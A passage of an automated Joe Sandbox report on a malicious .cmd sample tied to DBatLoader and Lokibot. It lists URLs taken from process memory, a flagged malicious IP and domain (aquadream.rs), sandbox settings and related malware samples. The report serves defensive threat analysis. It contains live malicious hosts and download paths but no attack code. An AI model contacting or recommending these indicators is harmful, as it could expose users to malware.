                                                                                        http://www.pmail.comAnyDesk.PIF, AnyDesk.PIF, 0000000A.00000002.1535579882.0000000002D6E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1446631582.000000007F910000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1535026723.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1578294915.000000007FA8F000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1446334242.0000000002A92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.ursing-caregiver-jobs-za-3.bondexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://ocsp.sectigo.com0CAnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.826mza.top/d05n/explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.evelupcasino.clubexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.ultangaziescortbayanlari.online/d05n/www.yzsports200.xyzexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.ybzert.online/d05n/www.trl-migrate.onlineexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000012.00000000.1548457580.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3876463266.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.00000000090DA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEPkn.exe, 00000007.00000002.1429457981.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000000.1425526307.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1434200373.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1442396876.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drfalse
                                                                                                  		high
                                                                                                  https://aquadream.rs/244_IpkokioahlpxAnyDesk.PIF, 0000000A.00000002.1533987559.0000000000965000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://ocsp.sectigo.com0AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.atingdilse.siteReferer:explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.ybzert.onlineReferer:explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.yzsports200.xyz/d05n/explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.atingdilse.site/d05n/explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.estspacefox.shopexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.estspacefox.shop/d05n/www.ebsiteclients.onlineexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://schemas.microexplorer.exe, 00000012.00000002.3873956110.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000002.3873928957.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.1541620806.0000000002C80000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.yzsports200.xyzReferer:explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://wns.windows.com/EM0explorer.exe, 00000012.00000003.3077399807.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3879092352.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285822156.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.ustavoglins.store/d05n/www.estspacefox.shopexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://www.ultangaziescortbayanlari.online/d05n/explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://aquadream.rs:443/244_IpkokioahlpAnyDesk.PIF, 0000000A.00000002.1533987559.0000000000997000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://www.nilink.educationReferer:explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.xc31.topexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://www.yzsports200.xyzexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.rnuah.xyzReferer:explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.atingdilse.site/d05n/www.askabirokulmumkun.onlineexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://%ws/%ws_%ws_%ws/service.svc/%wskn.exefalse
                                                                                                                                		high
                                                                                                                                https://enterpriseregistration.windows.net/EnrollmentServer/device/kn.exefalse
                                                                                                                                  		high
                                                                                                                                  http://www.atingdilse.siteexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.ebsiteclients.onlineexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.ebsiteclients.onlineReferer:explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://sectigo.com/CPS0AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://login.microsoftonline.com/%s/oauth2/tokenkn.exefalse
                                                                                                                                          		high

                                                                                                                                          World Map of Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public IPs

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          185.102.77.43
                                                                                                                                          		aquadream.rsCzech Republic
                                                                                                                                          		198171HOSTING90UPSTREAMconnectivityCZtrue

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                          Analysis ID:1563771
                                                                                                                                          Start date and time:2024-11-27 13:21:12 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 11m 39s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                          Number of analysed new started processes analysed:24
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:1
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Sample name:A1 igazol#U00e1s.cmd
                                                                                                                                          renamed because original name is a hash value
                                                                                                                                          Original Sample Name:A1 igazols.cmd
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.bank.troj.evad.winCMD@35/15@12/1
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                          • Number of executed functions: 59
                                                                                                                                          • Number of non-executed functions: 208
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .cmd
                                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                          Warnings

                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                          • VT rate limit hit for: A1 igazol#U00e1s.cmd

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          07:22:11API Interceptor2x Sleep call for process: AnyDesk.PIF modified
                                                                                                                                          07:22:26API Interceptor7782756x Sleep call for process: explorer.exe modified
                                                                                                                                          07:23:05API Interceptor6958309x Sleep call for process: msdt.exe modified

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          185.102.77.43Confirmation.docx.exeGet hashmaliciousDBatLoader, LokibotBrowse
                                                                                                                                            megerosites.cmdGet hashmaliciousDBatLoader, LokibotBrowse
                                                                                                                                              Uplata_391.cmdGet hashmaliciousDBatLoaderBrowse

                                                                                                                                                Domains

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                aquadream.rsConfirmation.docx.exeGet hashmaliciousDBatLoader, LokibotBrowse
                                                                                                                                                • 185.102.77.43
                                                                                                                                                megerosites.cmdGet hashmaliciousDBatLoader, LokibotBrowse
                                                                                                                                                • 185.102.77.43
                                                                                                                                                Uplata_391.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                • 185.102.77.43

                                                                                                                                                ASNs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                HOSTING90UPSTREAMconnectivityCZyakov.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 37.46.86.199
                                                                                                                                                Confirmation.docx.exeGet hashmaliciousDBatLoader, LokibotBrowse
                                                                                                                                                • 185.102.77.43
                                                                                                                                                megerosites.cmdGet hashmaliciousDBatLoader, LokibotBrowse
                                                                                                                                                • 185.102.77.43
                                                                                                                                                Uplata_391.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                • 185.102.77.43
                                                                                                                                                sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 171.33.140.91
                                                                                                                                                data.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 130.193.9.47
                                                                                                                                                file.log.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 130.193.9.47
                                                                                                                                                data.log.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 130.193.9.47
                                                                                                                                                message.txt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 130.193.9.47
                                                                                                                                                test.dat.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 130.193.9.47

